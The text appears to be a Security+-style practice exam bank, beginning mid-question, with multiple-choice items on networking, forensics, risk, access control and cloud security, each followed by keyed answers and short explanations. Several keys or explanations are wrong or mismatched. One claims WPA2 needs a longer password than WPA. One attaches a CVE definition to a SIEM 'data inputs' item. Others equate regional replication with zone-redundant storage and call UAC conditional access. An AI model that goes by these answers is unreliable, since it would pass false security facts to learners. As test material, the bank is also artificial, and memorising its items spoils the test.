[]A loop in the network (A switch loop on the network will cause network connections to drop since the packet cannot make the appropriate hop to the next switch toward its final destination. Switching loops also generate broadcast storms.) []STP (STP (Spanning Tree Protocol) is a means for the bridges to organize themselves into a hierarchy and prevent loops from forming.)

A company allows the use of corporate apps on employee-owned mobile devices. Mobile application management (MAM) services make this possible. Examining the list of available enterprise mobility management (EMM) features in today's market, which of the following would NOT be available for use in this case? (Select all that apply.) []Use of containers []Ability to remote wipe []Deployment of workspaces []Manage camera use

[]Ability to remote wipe (The ability to remote wipe a mobile device is made possible using policies created by mobile device management (MDM) services. A company cannot forcefully control an employee-owned device in this manner.) []Manage camera use

A company is renovating a new office space and is updating all Cisco routers. The up-to-date Internetwork Operating System (IOS) will provide the best protection from zero-day exploits. What other options could a network administrator configure for route security? (Select all that apply.) []SNMP trap collections []IPv6 on clients []Block source routed packets []Message authentication

[]Block source routed packets (Blocking source routed packets prevents spoofed IP addresses from bypassing routers and firewall filters.) []Message authentication (Most dynamic routing protocols support message authentication via a shared secret configured on each device. This allows routers to accept only routing updates that are managed by the network team.)

Conclude which terms represent a core feature of the Diamond Model of Intrusion Analysis. (Select all that apply.) []Capability []Infrastructure []Victim []Eradication

[]Capability (The capability feature describes the tools and/or techniques of the adversary used in the event. All of the vulnerabilities and exposures utilized by the individual's capability, regardless of the victim, are its capacity.) []Infrastructure (The infrastructure feature describes the communication structures the adversary uses to utilize a capability.) []Victim (A victim is the target of the adversary and against whom vulnerabilities and exposures are exploited and capabilities used. It is useful to define the victim in terms of both the people or organization targeted, as well as the victim's assets (i.e., the attack surface).)

Determine appropriate methods the team can use to acquire OS-level information from Windows. (Select all that apply.) []Check system and security logs. []Initiate sleep mode and analyze the hibernation file. []Use memdump to capture data from volatile memory. []Reboot and analyze memory dump files.

[]Check system and security logs. (Windows system and security logs can provide insight on certain events, providing a timeline with who may have logged on or tried to log on to the system.) []Initiate sleep mode and analyze the hibernation file. (Windows creates a hibernation file at the root of the boot volume when in sleep mode. The data can be recovered and decompressed, then loaded into a software tool for analysis.) []Reboot and analyze memory dump files. (When Windows encounters an unrecoverable kernel error, Windows writes the contents of memory to a dump file or a mini dump file. Investigators can then analyze the contents for a variety of information.)

Select viable methods of investigation in the case of authentication attacks. (Select all that apply.) []Compare authentication logs with security and network logs. []Search application logs for use of unauthorized applications. []Monitor network bandwidth for irregularities. []Use a SIEM dashboard to identify suspicious trends in user traffic.

[]Compare authentication logs with security and network logs. (Even though investigating every security and network log manually would take forever, by comparing irregularities in authentication logs (such as incomplete authentication), investigators can correlate corresponding entries.) []Search application logs for use of unauthorized applications. (If an intruder is utilizing an application within the network, such as Remote Desktop, the application logs may provide the evidence.) []Use a SIEM dashboard to identify suspicious trends in user traffic. (Security Information and Event Management (SIEM) software can often visualize log information to identify trends.)

A large company is moving to a new facility and selling its current office fully-furnished with the company's older PC workstations. Not only must the move be as quick as possible, but the company will also provide employees with new equipment. The IT department has backed up all the important data, and the company purchasing the office and equipment is a market competitor. Therefore, the company has instructed the IT department to perform full data sanitation and implement the recycling policy. Recommend types of data sanitation procedures the IT department should use before leaving the facility for good. (Select all that apply.) []Crypto erase hard drives []Perform a factory installation of Windows on all workstations []Pulverize USB drives []Degauss magnetic tape drives

[]Crypto erase hard drives (For drives that support it, such as self-encrypting drives (SEDs), crypto-erase is among the most secure methods of drive deletion. Crypto-erase, sometimes called Secure Erase, encrypts all data on the drive using a media encryption key. Then, the key is deleted, rendering the data unrecoverable.) []Pulverize USB drives (USB hard drives can be pulverized, leaving a poor chance of data recovery. Hard disks can be pulverized as well, but this should be done with industrial-grade machinery.) []Degauss magnetic tape drives (Degaussing is erasing data using a strong magnet on the hard disk or magnetic tapes. Degaussing removes the possibility of recovering any information.)

A visiting consultant to a company fails at trying to copy a file from a shared drive to a USB flash drive. Which security solutions block the file from being copied? (Select all that apply.) []Data loss prevention system (DLP) []Host intrusion detection system (HIDS) []Host intrusion prevention system (HIPS) []Endpoint protection platform (EPP)

[]Data loss prevention system (DLP) (Data loss prevention (DLP) is a security solution that is configured with policies to identify privileged files to prevent data from being copied or attached to a message without authorization.) []Endpoint protection platform (EPP) (An endpoint protection platform (EPP) usually depends on an agent running on a local host. Agents may be installed for services such as antivirus, intrusion detection, and data loss prevention.)

Which attack vector would an insider threat use to effectively install malicious tools on specific sets of servers for backdoor access? (Select all that apply.) []Wireless network []Direct access []Social media []Removable media

[]Direct access (Direct access is a type of physical or local attack. The threat actor could exploit an unlocked workstation, use a boot disk to try to install malicious tools, or steal a device.) []Removable media (Removable media like a USB drive or SD card can conceal malware. With direct access, a malicious USB can be inserted, and in some cases, automatically run malware to easily compromise the device.)

Teams of security experts are preparing for a penetration exercise using a white box environment. The activities will be monitored in an isolated environment in the company's local datacenter. What would be the appropriate rules of engagement for this exercise? (Select all that apply.) []Do not access production network. []Perform reconnaissance activities first. []Steal files from file server A. []Involve a cloud service provider.

[]Do not access production network. (An explicit rule to not access or perform penetration on the production network is a concrete objective. This reminds testers of the scope of the exercise which is limited to the isolated environment.) []Steal files from file server A. (Rules of engagement involve specifying the activities or goals of the exercise. A concrete objective such as "steal files from file server A" is very specific, rather than using vague descriptions like "break the network.")

A company deployed a wireless access point and wishes to enable the Enterprise mode for secure wireless connections. The servers have certificates, but the supplicants do not. Which of the following options would fit the company's needs? (Select all that apply.) []RADIUS Federation []EAP-FAST []PEAP []EAP-MD5

[]EAP-FAST (EAP-FAST (Flexible Authentication via Secure Tunneling) is Cisco's replacement for LEAP. It addresses LEAP vulnerabilities using TLS (Transport Layer Security) with PAC (Protected Access Credential) instead of certificates.) []PEAP (PEAP (Protected Extensible Authentication Protocol) uses a server-side public key certificate to create an encrypted tunnel between the supplicant and authentication server. PEAP is an industry standard.)

A severe tropical storm devastates an island where a small company stores data. Which disaster types have impacted the company? (Select all that apply.) []Internal []External []Person-made []Environmental

[]Environmental (An environmental or natural disaster is one that could not be prevented through human agency. Environmental disasters include floods, earthquakes, storms, or disease.) []External (External disaster events are caused by threat actors who have no privileged access and include disasters that have an impact on the organization through wider environmental or social impacts.)

A software developer created a new application, and the software company pressured the developer to release it to the public. Which of the following helps ensure the application is secure before the release? (Select all that apply.) []Application auditing []Error handling []Input validation []Proper authentication and authorization

[]Error handling (Some of the challenges of application development include the pressure to release a solution ahead of schedule, as well as neglecting secure development practices, such as error handling.) []Input validation (Input validation is another secure development practice that a software developer should not neglect.) []Proper authentication and authorization (Proper authentication and authorization is an important part of performing secure coding practices.)

An organization moves its data to the cloud. Engineers use regional replication to protect data. Review the descriptions and conclude which apply to this configuration. (Select all that apply.) []Known as zone-redundant storage []Safeguards data in the event of an outage covering a large area []Available access if a single data center is destroyed []Where the storage account was created

[]Known as zone-redundant storage (Regional replication (also called zone-redundant storage) replicates data across multiple data centers within one or two regions.) []Available access if a single data center is destroyed (Regional replication safeguards data and access in the event a single data center is destroyed or goes offline.)

Which of the following are common constraints of embedded systems? (Select all that apply.) []Network range []Compute power []Reliability []Cryptography capability

[]Network range (The lack of size and computing power also diminishes choices for network connectivity. Transmission Control Protocol/Internet Protocol (TCP/IP)-based networking can be too demanding for embedded systems with relatively low processing power.) []Compute power (Compute power is a common constraint of an embedded system. Embedded systems are relatively small and do not have the computing capabilities of a standard computer.) []Cryptography capability (Authentication is a common constraint for embedded systems. Because they lack compute capacity, embedded systems cannot match the authentication technologies of a standard network.)

After a year of vulnerability scans, a security engineer realized that there were zero false positive cases. The application logs showed no issues with the scanning tool and reports. What type of scanning tool or configuration would result in zero false positives being reported? (Select all that apply.) []Credentialed scan []Non-credentialed scan []Intrusive tool []Non-intrusive tool

[]Non-credentialed scan (A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the operating system (OS) or application. Fewer vulnerabilities are detected, resulting in fewer false positives.) []Non-intrusive tool (A non-intrusive or passive scanning tool analyzes indirect evidence, such as the types of traffic generated by a device. Fewer vulnerabilities are detected, resulting in fewer false positives.)

Password lockout commonly prohibits users from logging in after a number of failed password attempts. While this practice may protect against unauthorized users gaining access to valid user login information, what disadvantages could implementing this practice create for an organization? (Select all that apply.) []Password lockout is not as secure as a password reset system. []Password lockout increases the workload for security management. []Password lockout is vulnerable to Denial of Service (DoS) attacks. []Password lockout is more vulnerable to social engineering than other techniques.

[]Password lockout increases the workload for security management. (Password lockout also increases the workload for security managers, as this system typically requires an administrator to unlock locked accounts, and if this happens frequently, it can be quite time-consuming.) []Password lockout is vulnerable to Denial of Service (DoS) attacks. (Password lockout rules are vulnerable to DoS attacks. An attacker can simply overwhelm the password login system with login attempts and lock legitimate users out of their accounts, denying them service.)

A risk management implementation begins with which of the following characteristics? (Select all that apply.) []Mitigation []Prioritization []Classification []Identification

[]Prioritization (Prioritizing assets allows a company to decide which assets are most important to protect.) []Classification (Classifying assets and data according to criticality provides a company a basis to assess risks in the implementation process.) []Identification (Identifying assets requires indicating which hardware and software a company maintains. Identifying assets early in the risk management process allows for a smoother risk management implementation.)

Specify elements that a playbook should include. (Select all that apply.) []Query strings to identify incident types []Backup passwords and private keys []When to report compliance incidents []Incident categories and definitions

[]Query strings to identify incident types (Specific query strings and signatures easily scan and detect specific types of incidents. These strings improve response and resolution time.) []When to report compliance incidents (How to address compliance incidents with, for example, Health Insurance Portability and Accountability Act (HIPAA) laws should be outlined. It may include a list of contacts and their information, how to contact them, and when.) []Incident categories and definitions (Incident categories and descriptions help ensure that all management and operational staff have a shared framework for interpreting the meaning of terms, concepts, and definitions.)

Evaluate the attack types and determine which are used when a high-level executive is targeted via a suspicious text message. (Select all that apply.) []SMiShing []Whaling []Pharming []Vishing

[]SMiShing (SMiShing refers to using simple message service (SMS) text communications with a mobile device as an attack vector.) []Whaling (Whaling is a spear phishing attack directed specifically against upper levels of management in the organization (CEOs and other "big fish").)

Consider conditional access to a system and determine which options fit the criteria. (Select all that apply.) []Non-discretionary system []Sudo restrictions []Difficult to enforce []User Account Control (UAC)

[]Sudo restrictions (A conditional access system monitors account or device behavior throughout a session. An example is sudo restrictions on privileged accounts.) []User Account Control (UAC) (Conditional access is an example of rule-based access control where policies are determined by system-enforced rules. The User Account Control (UAC) is an example of conditional access.)

What are the main features that differentiate the Test Access Point (TAP) from a Switched Port Analyzer (SPAN)? (Select all that apply.) []Test access point (TAP) is considered 'active' only. []Test access point (TAP) avoids frame loss. []Test access point (TAP) is a temporary solution. []Test access point (TAP) is a separate hardware device.

[]Test access point (TAP) avoids frame loss. (Since no network or transport logic is used with a test access point (TAP), every frame is received, allowing reliable packet monitoring.) []Test access point (TAP) is a separate hardware device. (A test access point (TAP) is a hardware device that copies signals from the physical layer and the data link layer, while SPAN (switched port analyzer) is simply mirroring ports.)

Describe scenarios where containment measures, such as isolation and segmentation techniques, should be taken. (Select all that apply.) []The investigation of a recent incident is ongoing. []A compromised host pings another host periodically. []An unauthorized user accesses a server. []A worm has infected a device on the network.

[]The investigation of a recent incident is ongoing. []An unauthorized user accesses a server. []A worm has infected a device on the network.

A company purchased a few rack servers from a different vendor to try with their internal cluster. After a few months of integration failures, the company opted to remain with their previous vendor and to upgrade their other rack servers. The current commercial software will be migrated to the new rack servers. What may have caused the company to remain with their previous vendor for new rack servers? (Select all that apply.) []Vendor lacks expertise. []Servers are incompatible. []Disks are self-encrypting. []The code is unsecure.

[]Vendor lacks expertise. (A vendor that lacks expertise is also unable to support deployment and other activities required for using a rack server in the environment. Customer experience is vital to future purchases.) []Servers are incompatible. (Devices or software that are incompatible with other devices or software make them difficult to manage. Companies often seek compatibility factors to ensure full integration with existing assets.)

Evaluate and select the differences between WPA and WPA2. (Select all that apply.) []WPA2 supports an encryption algorithm based on the Advanced Encryption Standard (AES) rather than the version of RC4 "patched" with the Temporal Key Integrity Protocol (TKIP). []WPA2 requires entering a longer password than WPA. []WPA2 is much more secure than WEP, where WPA is not. []WPA2 is a security protocol developed by the Wi-Fi Alliance for use in securing wireless networks.

[]WPA2 supports an encryption algorithm based on the Advanced Encryption Standard (AES) rather than the version of RC4 "patched" with the Temporal Key Integrity Protocol (TKIP). []WPA2 requires entering a longer password than WPA.

Identify which tools would be used to identify suspicious network activity. (Select all that apply.) []Metasploit []tcpreplay []Wireshark []tcpdump

[]tcpreplay (tcpreplay is a command-line utility for Linux that can replay data from a .pcap file, for example, to analyze traffic patterns and data.) []Wireshark (Wireshark is a graphical application that can capture all types of traffic by sniffing the network, and save that data to a .pcap file.) []tcpdump (tcpdump is a command-line packet capture utility for Linux. The utility will display captured packets until halted manually, and it can save frames to a .pcap file. This tool commonly uses filter expressions to reduce the number of frames captured, such as Type, Direction, or Protocol.)

Which of the following is a computer that uses remote desktop protocol to run resources stored on a central server instead of a localized hard drive and provides minimal operating system services? -Edge computing -VDI -Fog computing -Thin client

-Thin client (A thin client is a computer that runs from resources stored on a central server instead of a localized hard drive. Thin clients work by connecting remotely to a central server-based computing environment where all resources and data are stored.)

An attacker exploited a vulnerability on a website frequently visited by a group of bank employees. Once the employees visit the site, the attacker's malware infects their computers. What type of attack did the employees fall for? -A hoax attack -A watering hole attack -A lunchtime attack -A pharming attack

-A watering hole attack (A watering hole attack is a directed social engineering attack. It relies on the circumstance that a group of targets may use an unsecure third-party website.)

A user receives access to a company system through the use of a smart card. The user can then access data they have privileges to access. A record of all events the user performs or attempts is kept in a log for administrative purposes. What access management policy does this best describe? -DAC -AAA -MAC -Group based

-AAA (Authentication, Authorization, and Accounting (AAA) provides a comprehensive access management approach to identifying, authorizing, and accounting for user activity.)

During a risk assessment, a company indicates the value of employee-used laptops to be $1,500.00 apiece. What should the company define to come up with the annual loss expectancy in a quantitative risk assessment? -ARO -RPO -RTO -ALE

-ARO (The annual rate of occurrence (ARO) indicates how many times a loss will occur within a year. An ARO is used in conjunction with the single loss expectancy (SLE) to figure the annual loss expectancy (ALE).)

A new company implements a datacenter that will hold proprietary data that is output from a daily workflow. As the company has not received any funding, no risk controls are in place. How does the company approach risk during operations? -Acceptance -Transference -Mitigation -Avoidance

-Acceptance (Risk acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.)

Which of the following attacks would allow an attacker to sniff all traffic on a switched network? -Internet Protocol (IP) spoofing -Domain Name System (DNS) spoofing -Address Resolution Protocol (ARP) poisoning -Transmission Control Protocol/Internet Protocol (TCP/IP) hijacking

-Address Resolution Protocol (ARP) poisoning (To sniff all traffic on a switched network, the switch must be overcome using ARP poisoning. ARP poisoning occurs when an attacker, with access to the network, redirects an IP address to the MAC address of an unintended computer.)

A logistics facility provides transportation services globally for many clients. Clients require their planning information to be kept in a secure environment not connected to a network until the needs have been fulfilled. Which of the following solutions would be the most ideal method of meeting this requirement for the company? -Mantrap -Container -Faraday cage -Air gap

-Air gap (An air gap is a host that is not physically connected to any network. Air gaps are secure areas that protect resources against unauthorized users and spillage of information.)

A Security Information and Event Management (SIEM) system parses network traffic and log data from multiple sensors, appliances, and hosts to implement correlation rules on metrics derived from data sources. SIEM assists the systems admin to detect events that may be potential incidents. Define the term for notifications passed upon detection of a potential incident. -Alerts -Trends -Sensitivity -Correlation

-Alerts

In a cloud environment, which of the following would be most detrimental in relation to access management of storage resources? -Any wildcard -Encryption -Container namespaces -Private subnet

-Any wildcard (Cloud resource policies configure read and/or write access to resources such as storage or services. Using any wildcard in read or write can break the principle of least privilege and opens up a high risk of exploitation.)

Which of the following is NOT an example of improper or weak application patch management? -Unmanaged assets -Performance degradation -Application design flaw -No documentation

-Application design flaw (An application design flaw is a vulnerability in the software. It can cause the security system to be circumvented or will cause the application to crash. For this reason, proper patch management processes are required to ensure service availability of the application.)

Recommend a strategy for organizing evidence during the e-discovery process of forensic investigation. -Make hardcopies -Organize by timestamps -Apply tags -Record the process on video

-Apply tags (Tags might be used to indicate relevancy to the case or part of the case or to show confidentiality and help organize evidence according to keywords or labels.)

A piece of data that may or may not be relevant to the investigation or incident response, such as registry keys, files, time stamps, and event logs, is known as what? -Checksums -Tags -Artifacts -Cache

-Artifacts (An artifact is a piece of data, such as registry keys, files, timestamps, and event logs, that may or may not be important to the investigative analysis or incident response.)

An engineer outlines a data protection plan. Part of the plan covers the challenges of protecting data in various states of existence. Evaluate the data states and conclude which will require that encryption keys stay safe for the longest period of time. -In motion -At rest -In use -In transit

-At rest (Data at rest is a state where the data is in some type of persistent storage media. There is an encryption challenge with data at rest as the encryption keys must be kept secure for longer.)

A government system uses Public Key Infrastructure to enable users to securely exchange data using both a public and private cryptographic key pair that is obtained and shared through a trusted authority. This process most likely describes which of the following? -2FA -Authentication application -IAM -Something you know authentication

-Authentication application (An authentication application is used to verify a user's access. Authentication applications use various means to identify a user, such as static codes, token keys, and Public Key Infrastructure.)

A threat actor is using which of the following techniques to circumvent the usual authentication method to a remote host? -Logic bomb -Rootkit -Backdoor -Keylogger

-Backdoor (A backdoor is any type of access method to a host that circumvents the usual authentication method and gives the remote user administrative control.)

A system administrator ensures that the checksum on the developed code checked into the Nexus repository matches the checksum presented to the customer to ensure the finished product is what was agreed upon. This best represents which of the following processes? -Change management -Configuration control -Baseline configuration -Benchmarking

-Baseline configuration (Baseline configurations are documented and agreed-upon sets of specifications for information systems. Baseline configurations serve as the starting point for development, patching, and changes to information systems.)

A small company has set up the domain environment to prevent the installation of a list of prohibited software. Employees received this same list via email. What type of method prevents the installation of specific software on workstations? -Application hardening -Anti-malware -Whitelisting -Blacklisting

-Blacklisting (Execution control, to prevent the use of unauthorized software, can be implemented as a blacklist. This control means that anything not on the prohibited blacklist can run.)

A recent attack on the company involving a threat actor from another country prompted the security team to host regular penetration testing exercises. The recent attack involved the IT team as well as human resources because an employee's desktop was breached. In the upcoming exercise, what role would the human resources team portray along with the IT team to simulate the recent attack and what was experienced during it? -White team -Blue team -Purple team -Red team

-Blue team (The blue team is one of two competing teams in a penetration testing exercise. The blue team performs a defensive role by operating, monitoring, and alerting controls.)

In a software as a service (SaaS) model, where the organization is responsible for the security and patching of the application and its components, which entity would be responsible for providing security services for the infrastructure? -CSP -CASB -IAM -CM

-CSP (The cloud service provider (CSP) would be responsible for the security of the infrastructure. A shared responsibility model includes both the CSP and the customer sharing security aspects of a cloud service model.)

Which of the following is an example of a vulnerability database that a security administrator can use with Tenable Nessus to assess the security state of servers on the network? -STIX -Threat map -CVE -TAXII

-CVE (Common Vulnerabilities and Exposures (CVE) is a database of information about vulnerabilities that are codified as signatures. A vulnerability scanner like Tenable Nessus uses CVE to scan the network to determine the security state of almost any device.)

Which threat actor would benefit the most from industry insider knowledge of a recently acquired employee? -White hat hackers -State actors -Competitor -Criminal syndicate

-Competitor (A company that participates in competitor-driven espionage often targets other competitors to disrupt business and damage reputation. This can increase revenue and profit for the business.)

Which de-identification method does an administrator use when choosing to replace the contents of a data field by redacting and substituting character strings? -Data masking -Tokenization -Pseudo-anonymization -Anonymization

-Data masking (Data masking can mean that all or part of the contents of a field is redacted, by substituting all character strings with "x" for example.)

A software developer enables a security feature commonly known as stack protection but does not execute the source code. Which of the following best describes what the developer is using? -Compiler -Interpreter -Input validator -Vulnerability scanner

-Compiler (A compiler is a program that translates high-level programming language into machine code that can later be executed many times against different data. A compiler does not execute source code.)

Define steganography. -Using a list of approved applications for security purposes -A method of containing malware -Concealing messages or information within other data -Building a plan for dealing with incidents

-Concealing messages or information within other data (Steganography obscures data by embedding it in another format. Messages can be covertly inserted into TCP packets, into images by modifying specific pixels, and even into audio files by embedding images or other data in them.)

A company runs certain applications within isolated cells according to employee job functions to minimize access to resources on the operating system. This type of virtualization is which of the following? -VPC -Container -Intranet -Hypervisor

-Container (Containers decouple services and applications from a host operating system. Containers run within isolated cells and do not have their own kernel. They allow for continuous integration and continuous delivery.)

Which coding automation concept relates to committing and testing updates often? -Continuous delivery -Continuous integration -Continuous deployment -Continuous monitoring

-Continuous integration (Continuous integration (CI) is the principle that developers should commit and test updates often, such as every day or sometimes even more frequently. For effective CI, it is important to use an automated test suite to validate each build quickly.)

A recent security audit necessitates separating network resources on a departmental level. The admin will implement the separation across hardware and software devices. After analyzing a list of suggestions, which approach provides a complete solution to the problem? -Apply firewall filters -Add a proxy -Create VLANs -Create an airgap

-Create VLANs (A Virtual Local Area Network (VLAN) is a logical group of network devices on the same LAN, despite their geographical distribution. It can divide the devices logically on the data link layer, and group users according to departments.)

A user at a company executes a program that displays a threatening message. The message says "files on the computer will remain encrypted until bitcoin is paid to a virtual wallet." Which of the following best describes this type of infection? -A logic bomb -Crypto-malware -A worm -A mine

-Crypto-malware (Ransomware is a type of Trojan malware that extorts money from the victim. The computer remains locked until the user pays the ransom. Crypto-malware is ransomware that attempts to encrypt data files. The user will be unable to access the files without the private encryption key.)

Which of the following is designed to mitigate losses from cyber incidents such as data breaches, outages, and network damage? -Administrative controls -Clean desk policy -Cybersecurity insurance -Control diversity

-Cybersecurity insurance (Cybersecurity insurance is a product that is offered to individuals and companies to protect them from the effects and consequences of cyber related attacks.)

The local operational network consists of physical electromechanical components controlling valves, motors, and electrical switches. All devices enterprise-wide trust each other in the internal network. Which of the following attacks could overwhelm the network by targeting vulnerabilities in the headers of specific application protocols? -Malicious PowerShell attack -Man-in-the-middle attack -DNS amplification attack -DDoS attack

-DNS amplification attack (A Domain Name System (DNS) amplification attack is an application attack that targets vulnerabilities in the headers and payloads of specific application protocols. It triggers a short request for a long response at the victim network.)

Which data governance role is responsible for ensuring compliance with legal and regulatory frameworks specifically related to processing, retention, and/or disclosure of personally identifiable information (PII)? -Data Steward -Data Owner -Data Privacy Officer (DPO) -Data Custodian

-Data Privacy Officer (DPO) (The data privacy officer is responsible for the oversight of assets handled by the organization containing personally identifiable information (PII). The Privacy Officer maintains consistency with legislative and regulatory frameworks of the collection, disclosure, and protection of PII.)

An application processes and transmits sensitive data containing personally identifiable information (PII). The development team uses secure coding techniques such as encryption, obfuscation, and code signing. Which of the following is the development team concerned with? -Data execution -Data exfiltration -Data exposure -Public data

-Data exposure (Sensitive data should be protected to prevent data exposure. Secure coding techniques such as encryption, code obfuscation, and signing can prevent data from being exposed and modified.)

A Security Information and Event Management (SIEM) system is heavily dependent on which of the following to provide meaningful information about security events and trends? -Data inputs -Reports -SCAP -Packet captures

-Data inputs (Common Vulnerabilities and Exposures (CVE) is a dictionary of vulnerabilities in published operating systems and applications software provided by cve.mitre.org. It includes the CVE ID, a brief description, a URL reference list, and the date of entry.)

An employee at a financial firm is responsible for ensuring that data is stored in accordance with applicable laws and regulations. What role does the employee have in terms of data governance? -Data steward -Data custodian -Data owner -Data processor

-Data steward

As a part of an effort toward a DevSecOps-based approach, a large tech company establishes a dedicated cyber incident response team (CIRT). The objective of the program is to exchange knowledge and insights and to work together to mitigate threats. Considering the team's need for diversity among team members, decide which type of individual they should include. -System administrator -Privacy officer -Decision maker -Privileged user

-Decision maker (Members of such a team should be able to have the breadth of decision-making and technical expertise necessary to cope with various kinds of accidents. The team should include a person with the authority to authorize intervention.)

After opening a third branch office in another state, the security team is having difficulty monitoring the network and managing system logs. Using a standard Security Information and Event Management (SIEM) system, what can the team do to better manage these events in a centralized way? -Use machine learning -Deploy listeners -Configure aggregation -Use Nikto

-Deploy listeners (A management server can be configured to be a listener or collector to gather logs from multiple sources and parse the data before sending it to the SIEM system. Multiple listeners can better manage collections to reduce the number of systems communicating with the SIEM.)

An engineer enables event logging on a server. Which type of security control did the engineer implement? -Detective -Compensating -Corrective -Deterrent

-Detective (A detective control may not prevent or deter access, but it will identify and record any attempted or successful intrusion.)

In which environment can multiple developers check out software code and include change management processes? -Test -Staging -Development -Production

-Development (A development environment is where developers create a product. Developers check out code for editing or updating. Version control and change management occur in the development environment to track development.)

A large business works with a consulting group to develop a business continuity plan. The goal of the plan is to provide a potentially uninterrupted workflow in the event of an incident. Examine the descriptions and determine which one matches this goal. -Recovery of primary business functions when disrupted -Ensuring processing redundancy supports the workflow -Retention of data for a specified period -Performing mission critical functions without IT support

-Ensuring processing redundancy supports the workflow (Business continuity planning identifies how business processes should deal with both minor and disaster-level disruption. It ensures that there is processing redundancy supporting the workflow through failover.)

IT discovers a flaw in a web application where it allows queries without encryption. As a result, requests are being spoofed and directories containing private files are viewable. What is happening? -Extensible Markup Language (XML) injection -Structured Query Language (SQL) injection -Dynamic Link Library (DLL) injection -Lightweight Directory Access Protocol (LDAP) injection

-Extensible Markup Language (XML) injection (Extensible Markup Language (XML) can be used for data exchange. Without encryption, it is vulnerable to spoofing, request forgery, and injection of arbitrary code. For example, an XML External Entity (XXE) attack embeds a request for a local resource.)

Which of the following protocols would secure file transfer services for an internal network? -SSTP -FTPES -LDAPS -DNSSEC

-FTPES (File Transfer Protocol Explicit Secure (FTPES) uses the AUTH TLS command to upgrade an unsecure connection established over port 21 to a secure one. This protects authentication credentials.)

An attacker launches a vishing social engineering attack by impersonating a police officer. The attacker calls the victims and tries to exploit this behavior by demanding the victims give the attacker their name and address immediately. This type of attack does NOT demonstrate what type of social engineering principle? -Urgency -Intimidation -Familiarity/liking -Authority

-Familiarity/liking (One of the basic tools of a social engineer is simply to be affable, likable, and persuasive, and to present the requests they make as completely reasonable and unobjectionable.)

What type of metadata could contain permissions in the form of an Access Control List? -Web metadata -File metadata -Mobile phone metadata -Email metadata

-File metadata (Information about when a file was created, accessed, and modified; access control lists defining who is authorized to read or modify the file; copyright information; and tags for indexing are all possible file metadata.)

A systems administrator plans to protect a data center with various security controls and safety mechanisms. Which solution does the administrator plan based on a "triangle" principle? -Motion detection -Industrial camouflage -Fire suppression -Noise detection

-Fire suppression (The fire triangle works on the principle that fire requires heat, oxygen, and fuel to ignite and burn. Removing any one of those elements provides fire suppression.)

Utilities, such as IPFix and Netflow, export a file based on collected IP traffic flow metadata. What is the name of this exported file? -Network log -Throughput record -Flow record -DNS log

-Flow record (Flow analyzers generate flow records, such as IPFix and Netflow, as a history of traffic flow, including timestamps and IP addresses.)

A datacenter requires an instantaneous failover power solution that is inexpensive. Which of the following is the least likely solution for the datacenter? -UPS -Generator -Managed PDU -Dual supply

-Generator (A generator is a device that converts mechanical energy into electrical energy for use in a peripheral circuit. Generators are an expensive option for power failover and do not immediately provide power.)

A Department of Defense (DoD) application is migrating to the cloud using Amazon Web Services (AWS) as the cloud service provider. As part of the service level agreement (SLA) and DoD mandate, the application must remain within the United States of America. AWS offers the application East (Boston) and West (Oregon) data centers for operations and failover. Which of the following is AWS providing in accordance with the SLA and DoD mandate? -Vendor diversity -Geographical considerations -Regulatory framework -Continuity of operations

-Geographical considerations (Amazon Web Services (AWS) is taking into account geographical considerations. The agreement mandates the system will stay within the United States.)

An application requires continuity of operations within a 24-hour period due to the command and control capabilities it maintains. The failover site must be physically separated from the program office and be available within the required timeframe with live data. Which of the following redundancy solutions best meets the failover requirement? -Meantime between failure -Geographical dispersal -Recovery time objective -Failover clusters

-Geographical dispersal (Geographical dispersal is a failover consideration that replicates data in hot and warm sites physically distanced from one another in the event of a catastrophe.)

For security purposes, mobile devices at an organization must include location metadata on all applicable data. Which method does the policy mandate? -Geotagging -Network location -Geofencing -Geolocation

-Geotagging (Geotagging refers to the addition of location metadata to files or devices. This is often used for asset management to ensure devices are kept in the proper location.)

Which of the following security mechanisms provides protection against Secure Socket Layer (SSL) stripping attacks? -HTTP Strict Transport Security (HSTS) -Secure cookies -Cache-Control -Content Security Policy (CSP)

-HTTP Strict Transport Security (HSTS) (HTTP Strict Transport Security (HSTS) forces browsers to connect using HTTPS only, mitigating downgrade attacks, such as Secure Socket Layer (SSL) stripping.)

Using Unified Extensible Firmware Interface (UEFI) to boot a server, the system must also provide secure boot capabilities. Part of the secure boot process requires a secure boot platform key or self-signed certificate. Determine which of the following an engineer can use to generate keys within the server using an available Peripheral Component Interconnect Express (PCIe) slot. -Trusted platform module -Hardware security module -NFC token -Password vault

-Hardware security module (A hardware security module (HSM) is an appliance designed to perform centralized public key infrastructure (PKI) management, key generation, or key escrow for devices. HSM can also be implemented as a plug-in PCIe adapter card to operate within a device.)

A microfabrication company recently suffered a breach of their R&D servers, from which blueprints and proprietary development documents were downloaded. What is likely the most impactful organizational consequence of this breach? -Fines -Reputation damage -IP-theft -Identity theft

-IP-theft (Theft of intellectual property means stealing innovations, technologies, and artistic expressions from individuals or corporations, known as "intellectual property," which may cover anything from trade secrets to patented products and components.)

A military organization is evaluating its disaster recovery plan (DRP) to assess risk and in particular identify any single points of failure. Suggest an initial action for the organization's evaluation. -Identify critical systems and mission essential functions -Assess site risk -Create a heat map -Renew cybersecurity insurance

-Identify critical systems and mission essential functions (Identifying critical systems and mission essential functions is often the first step of the risk management process, and will reveal any potential single points of failure.)

Which of the following is the service that provisions the user account and processes authentication requests? -Account attribute -Token -Certificate -Identity provider

-Identity provider (The identity provider (IdP) is the service that provisions the user account and processes authentication requests. On a private network, these identity directories and application authorization services can be operated locally.)

A fraudulent credit card purchase is an impact of which of the following? -Identity theft -Availability loss -Reputation damage -Privacy breach

-Identity theft (Identity theft involves stealing someone's identity to perform tasks in their name. For example, a threat actor uses personal details and financial information to make fraudulent credit applications and purchases.)

The financial staff at an organization works with IT and management to determine the risks associated with currently deployed systems. What measure of risk results from this analysis? -Residual risk -Inherent risk -Control risk -Risk appetite

-Inherent risk (The result of quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before any type of mitigation has been attempted.)

Recommend a strategy to establish what witnesses were doing at the scene, whether they observed any suspicious behavior or activity, and to gather information about the computer system. -Video record the investigation -Read digital forensics reports -Interview witnesses -Apply tags

-Interview witnesses

Which of the following is TRUE about false negatives in relation to vulnerability scanning tools? (Select all that apply.) -Is identified -Is not identified -Is a high risk -Is not high risk

-Is a high risk (False negatives are the potential vulnerabilities that are not identified by the scanning tool. It is possible the vulnerability has not been discovered, or a hacker may have spoofed the vulnerability as if nothing is wrong.)

